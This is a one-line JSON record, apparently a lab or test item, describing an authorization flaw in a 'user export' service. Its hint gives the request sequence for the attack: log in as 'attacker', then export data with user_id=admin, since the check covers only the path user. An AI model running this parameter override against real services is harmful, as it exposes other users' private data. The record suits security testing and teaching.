{"service":"user export","hint":"GET /login?user=attacker then /users/attacker/export?user_id=admin","filter":"authorization checks only the path user before user_id override is applied"}